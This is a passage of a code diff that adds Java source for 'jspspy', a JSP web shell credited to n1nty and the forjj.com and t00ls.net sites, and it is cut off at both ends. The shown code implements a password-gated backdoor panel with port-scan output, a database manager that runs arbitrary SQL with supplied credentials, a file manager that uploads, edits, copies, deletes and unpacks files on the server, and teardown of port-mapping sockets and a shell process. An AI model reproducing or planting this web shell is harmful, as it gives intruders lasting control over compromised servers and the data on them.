+						Map.Entry e = (Map.Entry)it.next();
+						String port = (String)e.getKey();
+						String value = (String)e.getValue();
+						out.println(ip+" : "+port+" ................................. <font color="+(value.equals("Close")?"red":"green")+"><b>"+value+"</b></font><br>");
+					}
+					out.println("</div>");
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class VConnInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					Object obj = JSession.getAttribute(DBO);
+					if (obj == null || !((DBOperator)obj).isValid()) {
+						out.println("  <script type=\"text/javascript\">"+
+						"	function changeurldriver(){"+
+						"		var form = document.forms[\"form1\"];"+
+						"		var v = form.elements[\"db\"].value;"+
+						"		form.elements[\"url\"].value = v.split(\"`\")[1];"+
+						"		form.elements[\"driver\"].value = v.split(\"`\")[0];"+
+						"		form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;"+
+						"	}"+
+						"  </script>");
+						out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+						"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+						"<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\"0\">"+
+						"<h2>DataBase Manager &raquo;</h2>"+
+						"<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"+
+						"<p>"+
+						"Driver:"+
+						"  <input class=\"input\" name=\"driver\" id=\"driver\" type=\"text\" size=\"35\"  />"+
+						"URL:"+
+						"<input class=\"input\" name=\"url\" id=\"url\" value=\"\" type=\"text\" size=\"90\"  />"+
+						"UID:"+
+						"<input class=\"input\" name=\"uid\" id=\"uid\" value=\"\" type=\"text\" size=\"10\"  />"+
+						"PWD:"+
+						"<input class=\"input\" name=\"pwd\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\"  />"+
+						"DataBase:"+
+						" <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >"+
+						" <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>"+
+						" <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>"+
+						" <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>"+
+						" <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:\\ninty.mdb'>Access</option>"+
+						" <option value=' ` '>Other</option>"+
+						" </select>"+
+						"<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\"  />"+
+						"</p>"+
+						"</form></table><script>changeurldriver()</script>");
+					} else {
+						((Invoker)ins.get("dbc")).invoke(request,response,JSession);
+					}
+				} catch (ClassCastException e) {
+					throw e;
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		//DBConnect
+		private static class DbcInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					String driver = request.getParameter("driver");
+					String url = request.getParameter("url");
+					String uid = request.getParameter("uid");
+					String pwd = request.getParameter("pwd");
+					String sql = request.getParameter("sql");
+					String selectDb = request.getParameter("selectDb");
+					if (selectDb == null)
+						selectDb = JSession.getAttribute("selectDb").toString();
+					else
+						JSession.setAttribute("selectDb",selectDb);
+					Object dbo = JSession.getAttribute(DBO);
+					if (dbo == null || !((DBOperator)dbo).isValid()) {
+						if (dbo != null)
+							((DBOperator)dbo).close();
+						dbo = new DBOperator(driver,url,uid,pwd,true);
+					} else {
+						if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) {
+							DBOperator oldDbo = (DBOperator)dbo;
+							dbo = new DBOperator(driver,url,uid,pwd);
+							if (!oldDbo.equals(dbo)) {
+								((DBOperator)oldDbo).close();
+								((DBOperator)dbo).connect();
+							} else {
+								dbo = oldDbo;
+							}
+						}
+					} 
+					DBOperator Ddbo = (DBOperator)dbo;
+					JSession.setAttribute(DBO,Ddbo);
+					if (!Util.isEmpty(request.getParameter("type")) && request.getParameter("type").equals("switch")) {
+						Ddbo.getConn().setCatalog(request.getParameter("catalog"));
+					}
+					Util.outMsg(out,"Connect To DataBase Success!");
+					out.println("  <script type=\"text/javascript\">"+
+						"	function changeurldriver(selectDb){"+
+						"		var form = document.forms[\"form1\"];"+
+						"		if (selectDb){"+
+						"			form.elements[\"db\"].selectedIndex = selectDb"+
+						"		}"+
+						"		var v = form.elements[\"db\"].value;"+
+						"		form.elements[\"url\"].value = v.split(\"`\")[1];"+
+						"		form.elements[\"driver\"].value = v.split(\"`\")[0];"+
+						"		form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;"+
+						"	}"+
+						"  </script>");
+					out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+						"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+						"<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\""+selectDb+"\">"+
+						"<h2>DataBase Manager &raquo;</h2>"+
+						"<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"+
+						"<p>"+
+						"Driver:"+
+						"  <input class=\"input\" name=\"driver\" value=\""+Ddbo.driver+"\" id=\"driver\" type=\"text\" size=\"35\"  />"+
+						"URL:"+
+						"<input class=\"input\" name=\"url\" value=\""+Ddbo.url+"\" id=\"url\" value=\"\" type=\"text\" size=\"90\"  />"+
+						"UID:"+
+						"<input class=\"input\" name=\"uid\" value=\""+Ddbo.uid+"\" id=\"uid\" value=\"\" type=\"text\" size=\"10\"  />"+
+						"PWD:"+
+						"<input class=\"input\" name=\"pwd\" value=\""+Ddbo.pwd+"\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\"  />"+
+						"DataBase:"+
+						" <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >"+
+						" <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>"+
+						" <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>"+
+						" <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>"+
+						" <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:/ninty.mdb'>Access</option>"+
+						" <option value=' ` '>Other</option>"+
+						" </select>"+
+						"<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\"  />"+
+						"</p>"+
+						"</form><script>changeurldriver('"+selectDb+"')</script>");
+					DatabaseMetaData meta = Ddbo.getConn().getMetaData();
+					out.println("<form action=\""+SHELL_NAME+"\" method=\"POST\">"+
+					"<p><input type=\"hidden\" name=\"selectDb\" value=\""+selectDb+"\"><input type=\"hidden\" name=\"o\" value=\"executesql\"><table width=\"200\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td colspan=\"2\">Version : <b style='color:red;font-size:14px'><i>"+meta.getDatabaseProductName()+" , "+meta.getDatabaseProductVersion()+"</i></b><br/>URL : <b style='color:red;font-size:14px'><i>"+meta.getURL()+"</i></b><br/>Catalog : <b style='color:red;font-size:14px'><i>"+Ddbo.getConn().getCatalog()+"</i></b><br/>UserName : <b style='color:red;font-size:14px'><i>"+meta.getUserName()+"</i></b><br/><br/></td></tr><tr><td colspan=\"2\">Run SQL query/queries on database / <b><i>Switch Database :</i></b> ");
+					out.println("<select id=\"catalogs\" onchange=\"if (this.value == '0') return;doPost({o:'executesql',type:'switch',catalog:document.getElementById('catalogs').value})\">");
+					out.println("<option value='0'>-- Select a DataBase --</option>");
+					ResultSet dbs = meta.getCatalogs();
+					try {
+						while (dbs.next()){
+							out.println("<option value='"+dbs.getString(1)+"'>"+dbs.getString(1)+"</option>");
+						}
+					}catch(Exception ex) {
+					}
+					dbs.close();
+					out.println("</select></td></tr><tr><td><textarea id=\"sql\" name=\"sql\" class=\"area\" style=\"width:600px;height:50px;overflow:auto;\">"+Util.htmlEncode(Util.getStr(sql))+"</textarea><input class=\"bt\" name=\"submit\" type=\"submit\" value=\"Query\" /> <input class=\"bt\" onclick=\"doPost({o:'export',type:'queryexp',sql:document.getElementById('sql').value})\" type=\"button\" value=\"Export\" /> <input type='button' value='Export To File' class='bt' onclick=\"doPost({o:'vExport',type:'queryexp',sql:document.getElementById('sql').value})\"></td><td nowrap style=\"padding:0 5px;\"></td></tr></table></p></form></table>");	
+					if (Util.isEmpty(sql)) {
+						String type = request.getParameter("type");
+						if (Util.isEmpty(type) || type.equals("switch")) {
+							ResultSet tbs = meta.getTables(null,null,null,null);
+							out.println(Table.rs2Table(tbs,meta.getIdentifierQuoteString(),true));
+							tbs.close();
+						} else if (type.equals("struct")) {
+							String tb = request.getParameter("table");
+							if (Util.isEmpty(tb))
+								return;
+							ResultSet t = meta.getColumns(null,null,tb,null);
+							out.println(Table.rs2Table(t,"",false));
+							t.close();
+						}
+					}
+				} catch (Exception e) {
+					JSession.setAttribute(MSG,"<span style='color:red'>Some Error Occurred. Please Check Out the StackTrace Follow.</span>"+BACK_HREF);
+					throw e;
+				}
+			}
+		}
+		private static class ExecuteSQLInvoker extends DefaultInvoker{
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					String sql = request.getParameter("sql");
+					String db = request.getParameter("selectDb");
+					Object dbo = JSession.getAttribute(DBO);
+					if (!Util.isEmpty(sql)) {
+						if (dbo == null || !((DBOperator)dbo).isValid()) {
+							((Invoker)ins.get("vConn")).invoke(request,response,JSession);
+							return;
+						} else {
+							((Invoker)ins.get("dbc")).invoke(request,response,JSession);
+							Object obj = ((DBOperator)dbo).execute(sql);
+							if (obj instanceof ResultSet) {
+								ResultSet rs = (ResultSet)obj;
+								ResultSetMetaData meta = rs.getMetaData();
+								int colCount = meta.getColumnCount();
+								out.println("<b style=\"margin-left:15px\">Query#0 : "+Util.htmlEncode(sql)+"</b><br/><br/>");
+								out.println("<table border=\"0\" cellpadding=\"3\" cellspacing=\"0\" style=\"margin-left:15px\"><tr class=\"head\">");
+								for (int i=1;i<=colCount;i++) {
+									out.println("<td nowrap>"+meta.getColumnName(i)+"<br><span>"+meta.getColumnTypeName(i)+"</span></td>");
+								}
+								out.println("</tr>");
+								Table tb = new Table();
+								while(rs.next()) {
+									Row r = new Row();
+									for (int i = 1;i<=colCount;i++) {
+										String v = null;
+										try {
+											v = rs.getString(i);
+										} catch (SQLException ex) {
+											v = "<<Error!>>";
+										}
+										r.addColumn(new Column(v));
+									}
+									tb.addRow(r);
+								}
+								out.println(tb.toString());
+								out.println("</table><br/>");
+								rs.close();
+								((DBOperator)dbo).closeStmt();
+							} else {
+								out.println("<b style='margin-left:15px'>affected rows : <i>"+obj+"</i></b><br/><br/>");
+							}
+						}
+					} else {
+						((Invoker)ins.get("dbc")).invoke(request,response,JSession);
+					}
+				} catch (Exception e) {
+
+					throw e ;
+				}
+			}
+		}
+		private static class VLoginInvoker extends DefaultInvoker {
+			public boolean doBefore() {return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					out.println("<html><head><title>jspspy</title><style type=\"text/css\">"+
+					"	input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}"+
+					"a{font:11px Verdana;BACKGROUND: #FFFFFF;}"+
+					"	</style></head><body><form method=\"POST\" action=\""+SHELL_NAME+"\">"+
+					"<!--<p style=\"font:11px Verdana;color:red\">Private Edition Dont Share It !</p>-->"+
+					"	  <p><span style=\"font:11px Verdana;\">Password: </span>"+
+					"        <input name=\"o\" type=\"hidden\" value=\"login\">"+
+					"        <input name=\"pw\" type=\"password\" size=\"20\">"+
+					"        <input type=\"hidden\" name=\"o\" value=\"login\">"+
+					"        <input type=\"submit\" value=\"Login\"><br/>"+
+					"<!--<span style=\"font:11px Verdana;\">Copyright &copy; 2009 NinTy </span><a href=\"http://www.forjj.com\" target=\"_blank\">www.Forjj.com</a>--></p>"+
+					"    </form><span style='font-weight:bold;color:red;font-size:12px'>CY... I Love You. I Do! by n1nty 2010/8/18</span></body></html>");
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class LoginInvoker extends DefaultInvoker{
+			public boolean doBefore() {return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					String inputPw = request.getParameter("pw");
+					if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) {
+						((Invoker)ins.get("vLogin")).invoke(request,response,JSession);
+						return;
+					} else {
+						JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw);
+						response.sendRedirect(SHELL_NAME);
+						return;
+					}
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class MyComparator implements Comparator{
+						public int compare(Object obj1,Object obj2) {
+							try {
+								if (obj1 != null && obj2 != null) {
+									File f1 = (File)obj1;
+									File f2 = (File)obj2;
+									if (f1.isDirectory()) {
+										if (f2.isDirectory()) {
+											return f1.getName().compareTo(f2.getName());
+										} else {
+											return -1;
+										}
+									} else { 
+										if (f2.isDirectory()) {
+											return 1;
+										} else {
+											return  f1.getName().toLowerCase().compareTo(f2.getName().toLowerCase());
+										}
+									}							
+								}
+								return 0;
+							} catch (Exception e) {
+								return 0;
+							}
+						}
+					}
+		private static class FileListInvoker extends DefaultInvoker {
+		public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception {
+			try {
+				String path2View = null;
+				PrintWriter out = response.getWriter();
+				String path = request.getParameter("folder");
+				String outEntry = request.getParameter("outentry");
+				if (!Util.isEmpty(outEntry) && outEntry.equals("true")) {
+					JSession.removeAttribute(ENTER);
+					JSession.removeAttribute(ENTER_MSG);
+					JSession.removeAttribute(ENTER_CURRENT_DIR);
+				}
+				Object enter = JSession.getAttribute(ENTER);
+					File file = null;
+					if (!Util.isEmpty(enter)) {
+						if (Util.isEmpty(path)) {
+							if (JSession.getAttribute(ENTER_CURRENT_DIR) == null)
+								path = "/";
+							else 
+								path = (String)(JSession.getAttribute(ENTER_CURRENT_DIR));
+						}
+						file = new EnterFile(path);
+						((EnterFile)file).setZf((String)enter);
+						JSession.setAttribute(ENTER_CURRENT_DIR,path);
+					} else {
+						if (Util.isEmpty(path))
+							path = JSession.getAttribute(CURRENT_DIR).toString();
+						JSession.setAttribute(CURRENT_DIR,Util.convertPath(path));
+						file = new File(path);
+					}
+					path2View = Util.convertPath(path);
+					if (!file.exists()) {
+						throw new Exception(path+"Dont Exists !");
+					}
+					File[] list = file.listFiles();
+					Arrays.sort(list,new MyComparator());
+					out.println("<div style='margin:10px'>");
+					String cr = null;
+					try {
+						cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3);
+					}catch(Exception e) {
+						cr = "/";
+					}
+					File currentRoot = new File(cr);
+					out.println("<h2>File Manager - Current disk &quot;"+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"&quot; total (unknow)</h2>");
+					out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
+					"<table width=\"98%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
+					"  <tr>"+
+					"    <td nowrap>Current Directory  <input type=\"hidden\" name=\"o\" value=\"filelist\"/></td>"+
+					"	<td width=\"98%\"><input class=\"input\" name=\"folder\" value=\""+path2View+"\" type=\"text\" style=\"width:100%;margin:0 8px;\"></td>"+
+					"    <td nowrap><input class=\"bt\" value=\"GO\" type=\"submit\"></td>"+
+					"  </tr>"+
+					"</table>"+
+					"</form>");
+					out.println("<table width=\"98%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\">"+
+					"<form action=\""+SHELL_NAME+"?o=upload\" method=\"POST\" enctype=\"multipart/form-data\"><tr class=\"alt1\"><td colspan=\"7\" style=\"padding:5px;\">"+
+					"<div style=\"float:right;\"><input class=\"input\" name=\"file\" value=\"\" type=\"file\" /> <input class=\"bt\" name=\"doupfile\" value=\"Upload\" "+(enter == null ?"type=\"submit\"":"type=\"button\" onclick=\"alert('You Are In File Now ! Can Not Upload !')\"")+" /></div>"+
+					"<a href=\"javascript:new fso({path:'"+Util.convertPath(WEB_ROOT)+"'}).subdir('true')\">Web Root</a>"+
+					" | <a href=\"javascript:new fso({path:'"+Util.convertPath(SHELL_DIR)+"'}).subdir('true')\">Shell Directory</a>"+
+					" | <a href=\"javascript:"+(enter == null ? "new fso({}).mkdir()" : "alert('You Are In File Now ! Can Not Create Directory ! ')")+"\">New Directory</a> | <a href=\"javascript:"+(enter == null ? "new fso({}).createFile()" : "alert('You Are In File Now ! Can Not Create File !')")+"\">New File</a>"+
+					" | ");
+					File[] roots = file.listRoots();
+					for (int i = 0;i<roots.length;i++) {
+						File r = roots[i];
+						out.println("<a href=\"javascript:new fso({path:'"+Util.convertPath(r.getPath())+"'}).subdir('true');\">Disk("+Util.convertPath(r.getPath())+")</a>");
+						if (i != roots.length -1) {
+							out.println("|");
+						} 
+					}
+					out.println("</td>"+
+					"</tr></form>"+
+					"<tr class=\"head\"><td>&nbsp;</td>"+
+					"  <td>Name</td>"+
+					"  <td width=\"16%\">Last Modified</td>"+
+					"  <td width=\"10%\">Size</td>"+
+					"  <td width=\"20%\">Read/Write/Execute</td>"+
+					"  <td width=\"22%\">&nbsp;</td>"+
+					"</tr>");
+					if (file.getParent() != null) {
+						out.println("<tr class=alt1>"+
+						"<td align=\"center\"><font face=\"Wingdings 3\" size=4>=</font></td>"+
+						"<td nowrap colspan=\"5\"><a href=\"javascript:new fso({path:'"+Util.convertPath(file.getAbsolutePath())+"'}).parent()\">Goto Parent</a></td>"+
+						"</tr>");	
+					}
+					int dircount = 0;
+					int filecount = 0;
+					for (int i = 0;i<list.length;i++) {
+						File f = list[i];
+						if (f.isDirectory()) {
+							dircount ++;
+							out.println("<tr class=\"alt2\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt2';\">"+
+							"<td width=\"2%\" nowrap><font face=\"wingdings\" size=\"3\">0</font></td>"+
+							"<td><a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).subdir()\">"+f.getName()+"</a></td>"+
+							"<td nowrap>"+Util.formatDate(f.lastModified())+"</td>"+
+							"<td nowrap>--</td>"+
+							"<td nowrap>"+f.canRead()+" / "+f.canWrite()+" / unknow</td>"+
+							"<td nowrap>");
+							if (enter != null) 
+								out.println("&nbsp;");
+							else 
+								out.println("<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).removedir()\">Del</a> | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).move()\">Move</a> | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).pack(true)\">Pack</a>");
+							out.println("</td></tr>");
+						} else {
+							filecount++;
+							out.println("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">"+
+							"<td width=\"2%\" nowrap><input type='checkbox' value='"+f.getName()+"'/></td>"+
+							"<td><a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).down()\">"+f.getName()+"</a></td>"+
+							"<td nowrap>"+Util.formatDate(f.lastModified())+"</td>"+
+							"<td nowrap>"+Util.getSize(f.length(),'B')+"</td>"+
+							"<td nowrap>"+
+							""+f.canRead()+" / "+f.canWrite()+" / unknow </td>"+
+							"<td nowrap>"+
+							"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).vEdit()\">Edit</a> | "+
+							"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).down()\">Down</a> | "+
+							"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).copy()\">Copy</a>");
+							if (enter == null ) {
+								out.println(" | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).move()\">Move</a> | "+
+								"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).vEditProperty()\">Property</a> | "+
+								"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).enter()\">Enter</a>");
+								if (f.getName().endsWith(".zip") || f.getName().endsWith(".jar")) {
+									out.println(" | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).unpack()\">UnPack</a>");
+								} else if (f.getName().endsWith(".rar")) {
+									out.println(" | <a href=\"javascript:alert('Dont Support RAR,Please Use WINRAR');\">UnPack</a>");
+								} else {
+									out.println(" | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).pack()\">Pack</a>");
+								}
+							}
+							out.println("</td></tr>");
+						}
+					}
+					out.println("<tr class=\"alt2\"><td align=\"center\">&nbsp;</td>"+
+					"  <td>");
+					if (enter != null) 
+						out.println("<a href=\"javascript:alert('You Are In File Now ! Can Not Pack !');\">Pack Selected</a> - <a href=\"javascript:alert('You Are In File Now ! Can Not Delete !');\">Delete Selected</a>");
+					else 
+						out.println("<a href=\"javascript:new fso({}).packBatch();\">Pack Selected</a> - <a href=\"javascript:new fso({}).deleteBatch();\">Delete Selected</a>");
+					out.println("</td>"+
+					"  <td colspan=\"4\" align=\"right\">"+dircount+" directories / "+filecount+" files</td></tr>"+
+					"</table>");
+					out.println("</div>");
+					if (file instanceof EnterFile)
+						((EnterFile)file).close();
+			} catch (ZipException e) {
+				JSession.setAttribute(MSG,"\""+JSession.getAttribute(ENTER).toString()+"\" Is Not a Zip File. Please Exit.");
+				throw e;
+			} catch (Exception e) {
+				JSession.setAttribute(MSG,"File Does Not Exist Or You Dont Have Privilege."+BACK_HREF);
+				throw e;
+			}
+		}
+	}
+	private static class LogoutInvoker extends DefaultInvoker {
+			public boolean doBefore() {return false;}
+			public boolean doAfter() {return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					Object dbo = JSession.getAttribute(DBO);
+					if (dbo != null)
+						((DBOperator)dbo).close();
+					Object obj = JSession.getAttribute(PORT_MAP);
+					if (obj != null) {
+						ServerSocket s = (ServerSocket)obj;
+						s.close();
+					}
+					Object online = JSession.getAttribute(SHELL_ONLINE);
+					if (online != null)
+						((OnLineProcess)online).stop();
+					JSession.invalidate();
+					((Invoker)ins.get("vLogin")).invoke(request,response,JSession);
+				} catch (ClassCastException e) {
+					JSession.invalidate();
+					((Invoker)ins.get("vLogin")).invoke(request,response,JSession);
+				} catch (Exception e) {
+
+					throw e ;
+				}
+			}
+		}
+		private static class UploadInvoker extends DefaultInvoker {
+			public boolean doBefore() {return false;}
+			public boolean doAfter() {return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					UploadBean fileBean = new UploadBean();
+					response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString());
+					fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString());
+					fileBean.parseRequest(request);
+					JSession.setAttribute(MSG,"Upload File Success!");
+					response.sendRedirect(SHELL_NAME);
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class CopyInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					String src = request.getParameter("src");
+					String to = request.getParameter("to");
+					InputStream in = null;
+					Object enter = JSession.getAttribute(ENTER);
+					if (enter == null)
+						in = new FileInputStream(new File(src));
+					else {
+						ZipFile zf = new ZipFile((String)enter);
+						ZipEntry entry = zf.getEntry(src);
+						in = zf.getInputStream(entry);
+					}
+					BufferedInputStream input = new BufferedInputStream(in);
+					BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to)));
+					byte[] d = new byte[1024];
+					int len = input.read(d);
+					while(len != -1) {
+						output.write(d,0,len);
+						len = input.read(d);
+					}
+					output.close();
+					input.close();
+					JSession.setAttribute(MSG,"Copy File Success!");
+					response.sendRedirect(SHELL_NAME);
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class BottomInvoker extends DefaultInvoker {
+			public boolean doBefore() {return false;}
+			public boolean doAfter() {return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					response.getWriter().println("<div style=\"padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;\">Copyright (C) 2009 <a href=\"http://www.forjj.com\" target=\"_blank\">http://www.Forjj.com/</a>&nbsp;&nbsp;<a target=\"_blank\" href=\"http://www.t00ls.net/\">[T00ls.Net]</a> All Rights Reserved."+
+					"</div>");
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class VCreateFileInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					String path = request.getParameter("filepath");
+					File f = new File(path);
+					if (!f.isAbsolute()) {
+						String oldPath = path;
+						path = JSession.getAttribute(CURRENT_DIR).toString();
+						if (!path.endsWith("/"))
+							path+="/";
+						path+=oldPath;
+						f = new File(path);
+						f.createNewFile();
+					} else {
+						f.createNewFile();
+					}
+					out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+					"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+					"<h2>Create / Edit File &raquo;</h2>"+
+					"<input type='hidden' name='o' value='createFile'>"+
+					"<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\""+path+"\" type=\"text\" size=\"100\"  />"+
+					" <select name='charset' class='input'><option value='ANSI'>ANSI</option><option value='UTF-8'>UTF-8</option></select></p>"+
+					"<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" ></textarea></p>"+
+					"<p><input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\"  type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>"+
+					"</form>"+
+					"</td></tr></table>");
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class VEditInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					String path = request.getParameter("filepath");
+					String charset = request.getParameter("charset");
+					Object enter = JSession.getAttribute(ENTER);
+					InputStream input = null;
+					if (enter != null) {
+						ZipFile zf = new ZipFile((String)enter);
+						ZipEntry entry = new ZipEntry(path);
+						input = zf.getInputStream(entry);
+					} else {
+						File f = new File(path);
+						if (!f.exists())
+							return;
+						input = new FileInputStream(path);
+					}
+				
+						BufferedReader reader = null;
+						if (Util.isEmpty(charset) || charset.equals("ANSI"))
+							reader = new BufferedReader(new InputStreamReader(input));
+						else
+							reader = new BufferedReader(new InputStreamReader(input,charset));
+						StringBuffer content = new StringBuffer();
+						String s = reader.readLine();
+						while (s != null) {
+							content.append(s+"\r\n");
+							s = reader.readLine();
+						}
+						reader.close();
+						out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+					"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+					"<h2>Create / Edit File &raquo;</h2>"+
+					"<input type='hidden' name='o' value='createFile'>"+
+					"<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\""+path+"\" type=\"text\" size=\"100\"  />"+
+					" <select name='charset' id='fcharset' onchange=\"new fso({path:'"+path+"',charset:document.getElementById('fcharset').value}).vEdit()\" class='input'><option value='ANSI'>ANSI</option><option "+((!Util.isEmpty(charset) && charset.equals("UTF-8")) ? "selected" : "")+" value='UTF-8'>UTF-8</option></select></p>"+
+					"<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" >"+Util.htmlEncode(content.toString())+"</textarea></p>"+
+					"<p>");
+						if (enter != null)
+							out.println("<input class=\"bt\" name=\"submit\" id=\"submit\" onclick=\"alert('You Are In File Now ! Can Not Save !')\" type=\"button\" value=\"Submit\">");
+						else 
+							out.println("<input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\">");
+						out.println("<input class=\"bt\"  type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>"+
+					"</form>"+
+					"</td></tr></table>");
+					
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class CreateFileInvoker extends DefaultInvoker {
+			public boolean doBefore(){return false;}
+			public boolean doAfter(){return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					String path = request.getParameter("filepath");
+					String content = request.getParameter("filecontent");
+					String charset = request.getParameter("charset");
+					BufferedWriter outs = null;
